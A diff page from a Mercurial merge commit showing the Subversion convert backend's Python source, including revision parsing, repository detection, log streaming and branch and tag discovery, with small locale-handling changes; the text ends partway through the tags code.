##// END OF EJS Templates
merge with stable
Yuya Nishihara -
r45558:4a503c1b merge default
parent child Browse files
Show More
@@ -1,1589 +1,1599 b''
1 # Subversion 1.4/1.5 Python API backend
1 # Subversion 1.4/1.5 Python API backend
2 #
2 #
3 # Copyright(C) 2007 Daniel Holth et al
3 # Copyright(C) 2007 Daniel Holth et al
4 from __future__ import absolute_import
4 from __future__ import absolute_import
5
5
6 import os
6 import os
7 import re
7 import re
8 import xml.dom.minidom
8 import xml.dom.minidom
9
9
10 from mercurial.i18n import _
10 from mercurial.i18n import _
11 from mercurial.pycompat import open
11 from mercurial.pycompat import open
12 from mercurial import (
12 from mercurial import (
13 encoding,
13 encoding,
14 error,
14 error,
15 pycompat,
15 pycompat,
16 util,
16 util,
17 vfs as vfsmod,
17 vfs as vfsmod,
18 )
18 )
19 from mercurial.utils import (
19 from mercurial.utils import (
20 dateutil,
20 dateutil,
21 procutil,
21 procutil,
22 stringutil,
22 stringutil,
23 )
23 )
24
24
25 from . import common
25 from . import common
26
26
27 pickle = util.pickle
27 pickle = util.pickle
28 stringio = util.stringio
28 stringio = util.stringio
29 propertycache = util.propertycache
29 propertycache = util.propertycache
30 urlerr = util.urlerr
30 urlerr = util.urlerr
31 urlreq = util.urlreq
31 urlreq = util.urlreq
32
32
33 commandline = common.commandline
33 commandline = common.commandline
34 commit = common.commit
34 commit = common.commit
35 converter_sink = common.converter_sink
35 converter_sink = common.converter_sink
36 converter_source = common.converter_source
36 converter_source = common.converter_source
37 decodeargs = common.decodeargs
37 decodeargs = common.decodeargs
38 encodeargs = common.encodeargs
38 encodeargs = common.encodeargs
39 makedatetimestamp = common.makedatetimestamp
39 makedatetimestamp = common.makedatetimestamp
40 mapfile = common.mapfile
40 mapfile = common.mapfile
41 MissingTool = common.MissingTool
41 MissingTool = common.MissingTool
42 NoRepo = common.NoRepo
42 NoRepo = common.NoRepo
43
43
44 # Subversion stuff. Works best with very recent Python SVN bindings
44 # Subversion stuff. Works best with very recent Python SVN bindings
45 # e.g. SVN 1.5 or backports. Thanks to the bzr folks for enhancing
45 # e.g. SVN 1.5 or backports. Thanks to the bzr folks for enhancing
46 # these bindings.
46 # these bindings.
47
47
48 try:
48 try:
49 import svn
49 import svn
50 import svn.client
50 import svn.client
51 import svn.core
51 import svn.core
52 import svn.ra
52 import svn.ra
53 import svn.delta
53 import svn.delta
54 from . import transport
54 from . import transport
55 import warnings
55 import warnings
56
56
57 warnings.filterwarnings(
57 warnings.filterwarnings(
58 'ignore', module='svn.core', category=DeprecationWarning
58 'ignore', module='svn.core', category=DeprecationWarning
59 )
59 )
60 svn.core.SubversionException # trigger import to catch error
60 svn.core.SubversionException # trigger import to catch error
61
61
62 except ImportError:
62 except ImportError:
63 svn = None
63 svn = None
64
64
65
65
class SvnPathNotFound(Exception):
    # Raised when a module/path does not exist at the requested revision.
    pass
68
68
69
69
def revsplit(rev):
    """Parse a revision string and return (uuid, path, revnum).
    >>> revsplit(b'svn:a2147622-4a9f-4db4-a8d3-13562ff547b2'
    ...          b'/proj%20B/mytrunk/mytrunk@1')
    ('a2147622-4a9f-4db4-a8d3-13562ff547b2', '/proj%20B/mytrunk/mytrunk', 1)
    >>> revsplit(b'svn:8af66a51-67f5-4354-b62c-98d67cc7be1d@1')
    ('', '', 1)
    >>> revsplit(b'@7')
    ('', '', 7)
    >>> revsplit(b'7')
    ('', '', 0)
    >>> revsplit(b'bad')
    ('', '', 0)
    """
    # Peel off the trailing "@<revnum>" suffix, if present.
    prefix, at, tail = rev.rpartition(b'@')
    if at:
        revnum = int(tail)
    else:
        prefix, revnum = rev, 0
    uuid = mod = b''
    # The remainder should look like "svn:<uuid>/<module>"; the uuid and
    # module are only reported when both pieces are present.
    if prefix.startswith(b'svn:'):
        head, slash, modpath = prefix[4:].partition(b'/')
        if slash:
            uuid = head
            mod = b'/' + modpath
    return uuid, mod, revnum
95
95
96
96
def quote(s):
    # As of svn 1.7, many svn calls expect "canonical" paths. In
    # theory, we should call svn.core.*canonicalize() on all paths
    # before passing them to the API. Instead, we assume the base url
    # is canonical and copy the behaviour of svn URL encoding function
    # so we can extend it safely with new components. The "safe"
    # characters were taken from the "svn_uri__char_validity" table in
    # libsvn_subr/path.c.
    return urlreq.quote(s, b"!$&'()*+,-./:=@_~")
106
106
107
107
def geturl(path):
    """Return a canonical svn URL for the given path or URL."""
    try:
        return svn.client.url_from_path(svn.core.svn_path_canonicalize(path))
    except svn.core.SubversionException:
        # svn.client.url_from_path() fails with local repositories
        pass
    if os.path.isdir(path):
        path = os.path.normpath(os.path.abspath(path))
        if pycompat.iswindows:
            path = b'/' + util.normpath(path)
        # Module URL is later compared with the repository URL returned
        # by svn API, which is UTF-8.
        path = encoding.tolocal(path)
        path = b'file://%s' % quote(path)
    return svn.core.svn_path_canonicalize(path)
123
123
124
124
def optrev(number):
    """Build an svn_opt_revision_t pinned to the given revision number."""
    rev = svn.core.svn_opt_revision_t()
    rev.kind = svn.core.svn_opt_revision_number
    rev.value.number = number
    return rev
130
130
131
131
class changedpath(object):
    """Plain-Python copy of an svn changed-path record.

    Detaches the interesting fields from the (pool-backed) svn object so
    they remain usable after the originating pool goes away and can be
    pickled across processes.
    """

    def __init__(self, p):
        self.copyfrom_path, self.copyfrom_rev, self.action = (
            p.copyfrom_path,
            p.copyfrom_rev,
            p.action,
        )
137
137
138
138
def get_log_child(
    fp,
    url,
    paths,
    start,
    end,
    limit=0,
    discover_changed_paths=True,
    strict_node_history=False,
):
    """Stream svn log entries for url as pickles written to fp.

    Intended to run in a child process (see debugsvnlog); terminates the
    process with os._exit() after flushing fp.
    """
    protocol = -1

    def receiver(orig_paths, revnum, author, date, message, pool):
        # Copy changed-path records into plain objects so the tuple can
        # be pickled to the consuming parent process.
        paths = {}
        if orig_paths is not None:
            for k, v in pycompat.iteritems(orig_paths):
                paths[k] = changedpath(v)
        pickle.dump((paths, revnum, author, date, message), fp, protocol)

    try:
        # Use an ra of our own so that our parent can consume
        # our results without confusing the server.
        t = transport.SvnRaTransport(url=url)
        svn.ra.get_log(
            t.ra,
            paths,
            start,
            end,
            limit,
            discover_changed_paths,
            strict_node_history,
            receiver,
        )
    except IOError:
        # Caller may interrupt the iteration
        pickle.dump(None, fp, protocol)
    except Exception as inst:
        # Forward the error text; the parent aborts with it (see logstream).
        pickle.dump(stringutil.forcebytestr(inst), fp, protocol)
    else:
        # A pickled None marks the normal end of the stream.
        pickle.dump(None, fp, protocol)
    fp.flush()
    # With large history, cleanup process goes crazy and suddenly
    # consumes *huge* amount of memory. The output file being closed,
    # there is no need for clean termination.
    os._exit(0)
184
184
185
185
def debugsvnlog(ui, **opts):
    """Fetch SVN log in a subprocess and channel them back to parent to
    avoid memory collection issues.
    """
    # NOTE(review): with_lc_ctype presumably switches to the native
    # LC_CTYPE locale for the svn bindings -- confirm against util.
    with util.with_lc_ctype():
        if svn is None:
            raise error.Abort(
                _(b'debugsvnlog could not load Subversion python bindings')
            )

        args = decodeargs(ui.fin.read())
        get_log_child(ui.fout, *args)
197
198
198
199
class logstream(object):
    """Interruptible revision log iterator."""

    def __init__(self, stdout):
        # Pipe carrying pickled log entries from the child hg process.
        self._stdout = stdout

    def __iter__(self):
        while True:
            try:
                entry = pickle.load(self._stdout)
            except EOFError:
                raise error.Abort(
                    _(
                        b'Mercurial failed to run itself, check'
                        b' hg executable is in PATH'
                    )
                )
            try:
                # A valid entry is the 5-tuple pickled by get_log_child.
                orig_paths, revnum, author, date, message = entry
            except (TypeError, ValueError):
                # None terminates the stream; a bytes payload is an error
                # message forwarded from the child.
                if entry is None:
                    break
                raise error.Abort(_(b"log stream exception '%s'") % entry)
            yield entry

    def close(self):
        if self._stdout:
            self._stdout.close()
            self._stdout = None
228
229
229
230
class directlogstream(list):
    """Direct revision log iterator.
    This can be used for debugging and development but it will probably leak
    memory and is not suitable for real conversions."""

    def __init__(
        self,
        url,
        paths,
        start,
        end,
        limit=0,
        discover_changed_paths=True,
        strict_node_history=False,
    ):
        def receiver(orig_paths, revnum, author, date, message, pool):
            # Same entry shape as get_log_child, but accumulated in-process.
            paths = {}
            if orig_paths is not None:
                for k, v in pycompat.iteritems(orig_paths):
                    paths[k] = changedpath(v)
            self.append((paths, revnum, author, date, message))

        # Use an ra of our own so that our parent can consume
        # our results without confusing the server.
        t = transport.SvnRaTransport(url=url)
        svn.ra.get_log(
            t.ra,
            paths,
            start,
            end,
            limit,
            discover_changed_paths,
            strict_node_history,
            receiver,
        )

    def close(self):
        # Nothing to release; entries live in this list.
        pass
268
269
269
270
270 # Check to see if the given path is a local Subversion repo. Verify this by
271 # Check to see if the given path is a local Subversion repo. Verify this by
271 # looking for several svn-specific files and directories in the given
272 # looking for several svn-specific files and directories in the given
272 # directory.
273 # directory.
def filecheck(ui, path, proto):
    """Return True if path looks like the root of a local svn repository.

    Only probes for a handful of svn-specific files and directories,
    which is cheap and good enough in practice.
    """
    markers = (b'locks', b'hooks', b'format', b'db')
    return all(os.path.exists(os.path.join(path, name)) for name in markers)
278
279
279
280
280 # Check to see if a given path is the root of an svn repo over http. We verify
281 # Check to see if a given path is the root of an svn repo over http. We verify
281 # this by requesting a version-controlled URL we know can't exist and looking
282 # this by requesting a version-controlled URL we know can't exist and looking
282 # for the svn-specific "not found" XML.
283 # for the svn-specific "not found" XML.
def httpcheck(ui, path, proto):
    """Return True if proto://path is likely an svn repository over HTTP.

    Requests a version-controlled URL known not to exist and looks for
    the svn-specific "not found" XML in the response.
    """
    try:
        opener = urlreq.buildopener()
        rsp = opener.open(b'%s://%s/!svn/ver/0/.svn' % (proto, path), b'rb')
        data = rsp.read()
    except urlerr.httperror as inst:
        if inst.code != 404:
            # Except for 404 we cannot know for sure this is not an svn repo
            ui.warn(
                _(
                    b'svn: cannot probe remote repository, assume it could '
                    b'be a subversion repository. Use --source-type if you '
                    b'know better.\n'
                )
            )
            return True
        data = inst.fp.read()
    except Exception:
        # Could be urlerr.urlerror if the URL is invalid or anything else.
        return False
    return b'<m:human-readable errcode="160013">' in data
304
305
305
306
# Maps a URL scheme to the probe used to decide whether a URL with that
# scheme points at a Subversion repository.
protomap = {
    b'http': httpcheck,
    b'https': httpcheck,
    b'file': filecheck,
}
311
312
312
313
def issvnurl(ui, url):
    """Return True if url (or one of its parent paths) is an svn repo.

    Walks up the path one component at a time, applying the scheme's
    probe from protomap at each level.
    """
    try:
        proto, path = url.split(b'://', 1)
        if proto == b'file':
            # Turn Windows-style file:///C%3A/... into C:/...
            if (
                pycompat.iswindows
                and path[:1] == b'/'
                and path[1:2].isalpha()
                and path[2:6].lower() == b'%3a/'
            ):
                path = path[:2] + b':/' + path[6:]
            # pycompat.fsdecode() / pycompat.fsencode() are used so that bytes
            # in the URL roundtrip correctly on Unix. urlreq.url2pathname() on
            # py3 will decode percent-encoded bytes using the utf-8 encoding
            # and the "replace" error handler. This means that it will not
            # preserve non-UTF-8 bytes (https://bugs.python.org/issue40983).
            # url.open() uses the reverse function (urlreq.pathname2url()) and
            # has a similar problem
            # (https://bz.mercurial-scm.org/show_bug.cgi?id=6357). It makes
            # sense to solve both problems together and handle all file URLs
            # consistently. For now, we warn.
            unicodepath = urlreq.url2pathname(pycompat.fsdecode(path))
            if pycompat.ispy3 and u'\N{REPLACEMENT CHARACTER}' in unicodepath:
                ui.warn(
                    _(
                        b'on Python 3, we currently do not support non-UTF-8 '
                        b'percent-encoded bytes in file URLs for Subversion '
                        b'repositories\n'
                    )
                )
            path = pycompat.fsencode(unicodepath)
    except ValueError:
        # No scheme separator: treat the whole url as a local path.
        proto = b'file'
        path = os.path.abspath(url)
    if proto == b'file':
        path = util.pconvert(path)
    check = protomap.get(proto, lambda *args: False)
    while b'/' in path:
        if check(ui, path, proto):
            return True
        path = path.rsplit(b'/', 1)[0]
    return False
355
356
356
357
357 # SVN conversion code stolen from bzr-svn and tailor
358 # SVN conversion code stolen from bzr-svn and tailor
358 #
359 #
359 # Subversion looks like a versioned filesystem, branches structures
360 # Subversion looks like a versioned filesystem, branches structures
360 # are defined by conventions and not enforced by the tool. First,
361 # are defined by conventions and not enforced by the tool. First,
361 # we define the potential branches (modules) as "trunk" and "branches"
362 # we define the potential branches (modules) as "trunk" and "branches"
362 # children directories. Revisions are then identified by their
363 # children directories. Revisions are then identified by their
363 # module and revision number (and a repository identifier).
364 # module and revision number (and a repository identifier).
364 #
365 #
365 # The revision graph is really a tree (or a forest). By default, a
366 # The revision graph is really a tree (or a forest). By default, a
366 # revision parent is the previous revision in the same module. If the
367 # revision parent is the previous revision in the same module. If the
367 # module directory is copied/moved from another module then the
368 # module directory is copied/moved from another module then the
368 # revision is the module root and its parent the source revision in
369 # revision is the module root and its parent the source revision in
369 # the parent module. A revision has at most one parent.
370 # the parent module. A revision has at most one parent.
370 #
371 #
371 class svn_source(converter_source):
372 class svn_source(converter_source):
    def __init__(self, ui, repotype, url, revs=None):
        super(svn_source, self).__init__(ui, repotype, url, revs=revs)

        # Cheap rejection first: only probe URLs that can plausibly be svn.
        if not (
            url.startswith(b'svn://')
            or url.startswith(b'svn+ssh://')
            or (
                os.path.exists(url)
                and os.path.exists(os.path.join(url, b'.svn'))
            )
            or issvnurl(ui, url)
        ):
            raise NoRepo(
                _(b"%s does not look like a Subversion repository") % url
            )
        if svn is None:
            raise MissingTool(_(b'could not load Subversion python bindings'))

        try:
            version = svn.core.SVN_VER_MAJOR, svn.core.SVN_VER_MINOR
            if version < (1, 4):
                raise MissingTool(
                    _(
                        b'Subversion python bindings %d.%d found, '
                        b'1.4 or later required'
                    )
                    % version
                )
        except AttributeError:
            # Bindings predate the SVN_VER_* constants entirely.
            raise MissingTool(
                _(
                    b'Subversion python bindings are too old, 1.4 '
                    b'or later required'
                )
            )

        self.lastrevs = {}

        latest = None
        try:
            # Support file://path@rev syntax. Useful e.g. to convert
            # deleted branches.
            at = url.rfind(b'@')
            if at >= 0:
                latest = int(url[at + 1 :])
                url = url[:at]
        except ValueError:
            pass
        self.url = geturl(url)
        self.encoding = b'UTF-8'  # Subversion is always nominal UTF-8
        try:
            # NOTE(review): svn binding calls are wrapped in with_lc_ctype,
            # presumably so they see the native LC_CTYPE locale -- confirm.
            with util.with_lc_ctype():
                self.transport = transport.SvnRaTransport(url=self.url)
                self.ra = self.transport.ra
                self.ctx = self.transport.client
                self.baseurl = svn.ra.get_repos_root(self.ra)
                # Module is either empty or a repository path starting with
                # a slash and not ending with a slash.
                self.module = urlreq.unquote(self.url[len(self.baseurl) :])
                self.prevmodule = None
                self.rootmodule = self.module
                self.commits = {}
                self.paths = {}
                self.uuid = svn.ra.get_uuid(self.ra)
        except svn.core.SubversionException:
            ui.traceback()
            svnversion = b'%d.%d.%d' % (
                svn.core.SVN_VER_MAJOR,
                svn.core.SVN_VER_MINOR,
                svn.core.SVN_VER_MICRO,
            )
            raise NoRepo(
                _(
                    b"%s does not look like a Subversion repository "
                    b"to libsvn version %s"
                )
                % (self.url, svnversion)
            )

        if revs:
            if len(revs) > 1:
                raise error.Abort(
                    _(
                        b'subversion source does not support '
                        b'specifying multiple revisions'
                    )
                )
            try:
                latest = int(revs[0])
            except ValueError:
                raise error.Abort(
                    _(b'svn: revision %s is not an integer') % revs[0]
                )

        trunkcfg = self.ui.config(b'convert', b'svn.trunk')
        if trunkcfg is None:
            trunkcfg = b'trunk'
        self.trunkname = trunkcfg.strip(b'/')
        self.startrev = self.ui.config(b'convert', b'svn.startrev')
        try:
            self.startrev = int(self.startrev)
            if self.startrev < 0:
                self.startrev = 0
        except ValueError:
            raise error.Abort(
                _(b'svn: start revision %s is not an integer') % self.startrev
            )

        try:
            with util.with_lc_ctype():
                self.head = self.latest(self.module, latest)
        except SvnPathNotFound:
            self.head = None
        if not self.head:
            raise error.Abort(
                _(b'no revision found in module %s') % self.module
            )
        self.last_changed = self.revnum(self.head)

        self._changescache = (None, None)

        # Remember a working copy path, if the source is one.
        if os.path.exists(os.path.join(url, b'.svn/entries')):
            self.wc = url
        else:
            self.wc = None
        self.convertfp = None
496
499
    def before(self):
        # Enter the native-locale context for the whole conversion; the
        # matching __exit__ happens in after().
        # NOTE(review): assumes before()/after() are always paired by the
        # conversion driver -- confirm against convcmd.
        self.with_lc_ctype = util.with_lc_ctype()
        self.with_lc_ctype.__enter__()
503
    def after(self):
        # Leave the context entered in before(); passing three Nones means
        # no exception is being propagated through it.
        self.with_lc_ctype.__exit__(None, None, None)
506
497 def setrevmap(self, revmap):
507 def setrevmap(self, revmap):
498 lastrevs = {}
508 lastrevs = {}
499 for revid in revmap:
509 for revid in revmap:
500 uuid, module, revnum = revsplit(revid)
510 uuid, module, revnum = revsplit(revid)
501 lastrevnum = lastrevs.setdefault(module, revnum)
511 lastrevnum = lastrevs.setdefault(module, revnum)
502 if revnum > lastrevnum:
512 if revnum > lastrevnum:
503 lastrevs[module] = revnum
513 lastrevs[module] = revnum
504 self.lastrevs = lastrevs
514 self.lastrevs = lastrevs
505
515
    def exists(self, path, optrev):
        """Return True if path exists in the repository at optrev."""
        try:
            # ls raises SubversionException for missing paths; we only
            # care whether the call succeeds.
            svn.client.ls(
                self.url.rstrip(b'/') + b'/' + quote(path),
                optrev,
                False,
                self.ctx,
            )
            return True
        except svn.core.SubversionException:
            return False
517
527
518 def getheads(self):
528 def getheads(self):
519 def isdir(path, revnum):
529 def isdir(path, revnum):
520 kind = self._checkpath(path, revnum)
530 kind = self._checkpath(path, revnum)
521 return kind == svn.core.svn_node_dir
531 return kind == svn.core.svn_node_dir
522
532
523 def getcfgpath(name, rev):
533 def getcfgpath(name, rev):
524 cfgpath = self.ui.config(b'convert', b'svn.' + name)
534 cfgpath = self.ui.config(b'convert', b'svn.' + name)
525 if cfgpath is not None and cfgpath.strip() == b'':
535 if cfgpath is not None and cfgpath.strip() == b'':
526 return None
536 return None
527 path = (cfgpath or name).strip(b'/')
537 path = (cfgpath or name).strip(b'/')
528 if not self.exists(path, rev):
538 if not self.exists(path, rev):
529 if self.module.endswith(path) and name == b'trunk':
539 if self.module.endswith(path) and name == b'trunk':
530 # we are converting from inside this directory
540 # we are converting from inside this directory
531 return None
541 return None
532 if cfgpath:
542 if cfgpath:
533 raise error.Abort(
543 raise error.Abort(
534 _(b'expected %s to be at %r, but not found')
544 _(b'expected %s to be at %r, but not found')
535 % (name, path)
545 % (name, path)
536 )
546 )
537 return None
547 return None
538 self.ui.note(
548 self.ui.note(
539 _(b'found %s at %r\n') % (name, pycompat.bytestr(path))
549 _(b'found %s at %r\n') % (name, pycompat.bytestr(path))
540 )
550 )
541 return path
551 return path
542
552
543 rev = optrev(self.last_changed)
553 rev = optrev(self.last_changed)
544 oldmodule = b''
554 oldmodule = b''
545 trunk = getcfgpath(b'trunk', rev)
555 trunk = getcfgpath(b'trunk', rev)
546 self.tags = getcfgpath(b'tags', rev)
556 self.tags = getcfgpath(b'tags', rev)
547 branches = getcfgpath(b'branches', rev)
557 branches = getcfgpath(b'branches', rev)
548
558
549 # If the project has a trunk or branches, we will extract heads
559 # If the project has a trunk or branches, we will extract heads
550 # from them. We keep the project root otherwise.
560 # from them. We keep the project root otherwise.
551 if trunk:
561 if trunk:
552 oldmodule = self.module or b''
562 oldmodule = self.module or b''
553 self.module += b'/' + trunk
563 self.module += b'/' + trunk
554 self.head = self.latest(self.module, self.last_changed)
564 self.head = self.latest(self.module, self.last_changed)
555 if not self.head:
565 if not self.head:
556 raise error.Abort(
566 raise error.Abort(
557 _(b'no revision found in module %s') % self.module
567 _(b'no revision found in module %s') % self.module
558 )
568 )
559
569
560 # First head in the list is the module's head
570 # First head in the list is the module's head
561 self.heads = [self.head]
571 self.heads = [self.head]
562 if self.tags is not None:
572 if self.tags is not None:
563 self.tags = b'%s/%s' % (oldmodule, (self.tags or b'tags'))
573 self.tags = b'%s/%s' % (oldmodule, (self.tags or b'tags'))
564
574
565 # Check if branches bring a few more heads to the list
575 # Check if branches bring a few more heads to the list
566 if branches:
576 if branches:
567 rpath = self.url.strip(b'/')
577 rpath = self.url.strip(b'/')
568 branchnames = svn.client.ls(
578 branchnames = svn.client.ls(
569 rpath + b'/' + quote(branches), rev, False, self.ctx
579 rpath + b'/' + quote(branches), rev, False, self.ctx
570 )
580 )
571 for branch in sorted(branchnames):
581 for branch in sorted(branchnames):
572 module = b'%s/%s/%s' % (oldmodule, branches, branch)
582 module = b'%s/%s/%s' % (oldmodule, branches, branch)
573 if not isdir(module, self.last_changed):
583 if not isdir(module, self.last_changed):
574 continue
584 continue
575 brevid = self.latest(module, self.last_changed)
585 brevid = self.latest(module, self.last_changed)
576 if not brevid:
586 if not brevid:
577 self.ui.note(_(b'ignoring empty branch %s\n') % branch)
587 self.ui.note(_(b'ignoring empty branch %s\n') % branch)
578 continue
588 continue
579 self.ui.note(
589 self.ui.note(
580 _(b'found branch %s at %d\n')
590 _(b'found branch %s at %d\n')
581 % (branch, self.revnum(brevid))
591 % (branch, self.revnum(brevid))
582 )
592 )
583 self.heads.append(brevid)
593 self.heads.append(brevid)
584
594
585 if self.startrev and self.heads:
595 if self.startrev and self.heads:
586 if len(self.heads) > 1:
596 if len(self.heads) > 1:
587 raise error.Abort(
597 raise error.Abort(
588 _(
598 _(
589 b'svn: start revision is not supported '
599 b'svn: start revision is not supported '
590 b'with more than one branch'
600 b'with more than one branch'
591 )
601 )
592 )
602 )
593 revnum = self.revnum(self.heads[0])
603 revnum = self.revnum(self.heads[0])
594 if revnum < self.startrev:
604 if revnum < self.startrev:
595 raise error.Abort(
605 raise error.Abort(
596 _(b'svn: no revision found after start revision %d')
606 _(b'svn: no revision found after start revision %d')
597 % self.startrev
607 % self.startrev
598 )
608 )
599
609
600 return self.heads
610 return self.heads
601
611
602 def _getchanges(self, rev, full):
612 def _getchanges(self, rev, full):
603 (paths, parents) = self.paths[rev]
613 (paths, parents) = self.paths[rev]
604 copies = {}
614 copies = {}
605 if parents:
615 if parents:
606 files, self.removed, copies = self.expandpaths(rev, paths, parents)
616 files, self.removed, copies = self.expandpaths(rev, paths, parents)
607 if full or not parents:
617 if full or not parents:
608 # Perform a full checkout on roots
618 # Perform a full checkout on roots
609 uuid, module, revnum = revsplit(rev)
619 uuid, module, revnum = revsplit(rev)
610 entries = svn.client.ls(
620 entries = svn.client.ls(
611 self.baseurl + quote(module), optrev(revnum), True, self.ctx
621 self.baseurl + quote(module), optrev(revnum), True, self.ctx
612 )
622 )
613 files = [
623 files = [
614 n
624 n
615 for n, e in pycompat.iteritems(entries)
625 for n, e in pycompat.iteritems(entries)
616 if e.kind == svn.core.svn_node_file
626 if e.kind == svn.core.svn_node_file
617 ]
627 ]
618 self.removed = set()
628 self.removed = set()
619
629
620 files.sort()
630 files.sort()
621 files = pycompat.ziplist(files, [rev] * len(files))
631 files = pycompat.ziplist(files, [rev] * len(files))
622 return (files, copies)
632 return (files, copies)
623
633
624 def getchanges(self, rev, full):
634 def getchanges(self, rev, full):
625 # reuse cache from getchangedfiles
635 # reuse cache from getchangedfiles
626 if self._changescache[0] == rev and not full:
636 if self._changescache[0] == rev and not full:
627 (files, copies) = self._changescache[1]
637 (files, copies) = self._changescache[1]
628 else:
638 else:
629 (files, copies) = self._getchanges(rev, full)
639 (files, copies) = self._getchanges(rev, full)
630 # caller caches the result, so free it here to release memory
640 # caller caches the result, so free it here to release memory
631 del self.paths[rev]
641 del self.paths[rev]
632 return (files, copies, set())
642 return (files, copies, set())
633
643
634 def getchangedfiles(self, rev, i):
644 def getchangedfiles(self, rev, i):
635 # called from filemap - cache computed values for reuse in getchanges
645 # called from filemap - cache computed values for reuse in getchanges
636 (files, copies) = self._getchanges(rev, False)
646 (files, copies) = self._getchanges(rev, False)
637 self._changescache = (rev, (files, copies))
647 self._changescache = (rev, (files, copies))
638 return [f[0] for f in files]
648 return [f[0] for f in files]
639
649
640 def getcommit(self, rev):
650 def getcommit(self, rev):
641 if rev not in self.commits:
651 if rev not in self.commits:
642 uuid, module, revnum = revsplit(rev)
652 uuid, module, revnum = revsplit(rev)
643 self.module = module
653 self.module = module
644 self.reparent(module)
654 self.reparent(module)
645 # We assume that:
655 # We assume that:
646 # - requests for revisions after "stop" come from the
656 # - requests for revisions after "stop" come from the
647 # revision graph backward traversal. Cache all of them
657 # revision graph backward traversal. Cache all of them
648 # down to stop, they will be used eventually.
658 # down to stop, they will be used eventually.
649 # - requests for revisions before "stop" come to get
659 # - requests for revisions before "stop" come to get
650 # isolated branches parents. Just fetch what is needed.
660 # isolated branches parents. Just fetch what is needed.
651 stop = self.lastrevs.get(module, 0)
661 stop = self.lastrevs.get(module, 0)
652 if revnum < stop:
662 if revnum < stop:
653 stop = revnum + 1
663 stop = revnum + 1
654 self._fetch_revisions(revnum, stop)
664 self._fetch_revisions(revnum, stop)
655 if rev not in self.commits:
665 if rev not in self.commits:
656 raise error.Abort(_(b'svn: revision %s not found') % revnum)
666 raise error.Abort(_(b'svn: revision %s not found') % revnum)
657 revcommit = self.commits[rev]
667 revcommit = self.commits[rev]
658 # caller caches the result, so free it here to release memory
668 # caller caches the result, so free it here to release memory
659 del self.commits[rev]
669 del self.commits[rev]
660 return revcommit
670 return revcommit
661
671
662 def checkrevformat(self, revstr, mapname=b'splicemap'):
672 def checkrevformat(self, revstr, mapname=b'splicemap'):
663 """ fails if revision format does not match the correct format"""
673 """ fails if revision format does not match the correct format"""
664 if not re.match(
674 if not re.match(
665 br'svn:[0-9a-f]{8,8}-[0-9a-f]{4,4}-'
675 br'svn:[0-9a-f]{8,8}-[0-9a-f]{4,4}-'
666 br'[0-9a-f]{4,4}-[0-9a-f]{4,4}-[0-9a-f]'
676 br'[0-9a-f]{4,4}-[0-9a-f]{4,4}-[0-9a-f]'
667 br'{12,12}(.*)@[0-9]+$',
677 br'{12,12}(.*)@[0-9]+$',
668 revstr,
678 revstr,
669 ):
679 ):
670 raise error.Abort(
680 raise error.Abort(
671 _(b'%s entry %s is not a valid revision identifier')
681 _(b'%s entry %s is not a valid revision identifier')
672 % (mapname, revstr)
682 % (mapname, revstr)
673 )
683 )
674
684
675 def numcommits(self):
685 def numcommits(self):
676 return int(self.head.rsplit(b'@', 1)[1]) - self.startrev
686 return int(self.head.rsplit(b'@', 1)[1]) - self.startrev
677
687
678 def gettags(self):
688 def gettags(self):
679 tags = {}
689 tags = {}
680 if self.tags is None:
690 if self.tags is None:
681 return tags
691 return tags
682
692
683 # svn tags are just a convention, project branches left in a
693 # svn tags are just a convention, project branches left in a
684 # 'tags' directory. There is no other relationship than
694 # 'tags' directory. There is no other relationship than
685 # ancestry, which is expensive to discover and makes them hard
695 # ancestry, which is expensive to discover and makes them hard
686 # to update incrementally. Worse, past revisions may be
696 # to update incrementally. Worse, past revisions may be
687 # referenced by tags far away in the future, requiring a deep
697 # referenced by tags far away in the future, requiring a deep
688 # history traversal on every calculation. Current code
698 # history traversal on every calculation. Current code
689 # performs a single backward traversal, tracking moves within
699 # performs a single backward traversal, tracking moves within
690 # the tags directory (tag renaming) and recording a new tag
700 # the tags directory (tag renaming) and recording a new tag
691 # everytime a project is copied from outside the tags
701 # everytime a project is copied from outside the tags
692 # directory. It also lists deleted tags, this behaviour may
702 # directory. It also lists deleted tags, this behaviour may
693 # change in the future.
703 # change in the future.
694 pendings = []
704 pendings = []
695 tagspath = self.tags
705 tagspath = self.tags
696 start = svn.ra.get_latest_revnum(self.ra)
706 start = svn.ra.get_latest_revnum(self.ra)
697 stream = self._getlog([self.tags], start, self.startrev)
707 stream = self._getlog([self.tags], start, self.startrev)
698 try:
708 try:
699 for entry in stream:
709 for entry in stream:
700 origpaths, revnum, author, date, message = entry
710 origpaths, revnum, author, date, message = entry
701 if not origpaths:
711 if not origpaths:
702 origpaths = []
712 origpaths = []
703 copies = [
713 copies = [
704 (e.copyfrom_path, e.copyfrom_rev, p)
714 (e.copyfrom_path, e.copyfrom_rev, p)
705 for p, e in pycompat.iteritems(origpaths)
715 for p, e in pycompat.iteritems(origpaths)
706 if e.copyfrom_path
716 if e.copyfrom_path
707 ]
717 ]
708 # Apply moves/copies from more specific to general
718 # Apply moves/copies from more specific to general
709 copies.sort(reverse=True)
719 copies.sort(reverse=True)
710
720
711 srctagspath = tagspath
721 srctagspath = tagspath
712 if copies and copies[-1][2] == tagspath:
722 if copies and copies[-1][2] == tagspath:
713 # Track tags directory moves
723 # Track tags directory moves
714 srctagspath = copies.pop()[0]
724 srctagspath = copies.pop()[0]
715
725
716 for source, sourcerev, dest in copies:
726 for source, sourcerev, dest in copies:
717 if not dest.startswith(tagspath + b'/'):
727 if not dest.startswith(tagspath + b'/'):
718 continue
728 continue
719 for tag in pendings:
729 for tag in pendings:
720 if tag[0].startswith(dest):
730 if tag[0].startswith(dest):
721 tagpath = source + tag[0][len(dest) :]
731 tagpath = source + tag[0][len(dest) :]
722 tag[:2] = [tagpath, sourcerev]
732 tag[:2] = [tagpath, sourcerev]
723 break
733 break
724 else:
734 else:
725 pendings.append([source, sourcerev, dest])
735 pendings.append([source, sourcerev, dest])
726
736
727 # Filter out tags with children coming from different
737 # Filter out tags with children coming from different
728 # parts of the repository like:
738 # parts of the repository like:
729 # /tags/tag.1 (from /trunk:10)
739 # /tags/tag.1 (from /trunk:10)
730 # /tags/tag.1/foo (from /branches/foo:12)
740 # /tags/tag.1/foo (from /branches/foo:12)
731 # Here/tags/tag.1 discarded as well as its children.
741 # Here/tags/tag.1 discarded as well as its children.
732 # It happens with tools like cvs2svn. Such tags cannot
742 # It happens with tools like cvs2svn. Such tags cannot
733 # be represented in mercurial.
743 # be represented in mercurial.
734 addeds = {
744 addeds = {
735 p: e.copyfrom_path
745 p: e.copyfrom_path
736 for p, e in pycompat.iteritems(origpaths)
746 for p, e in pycompat.iteritems(origpaths)
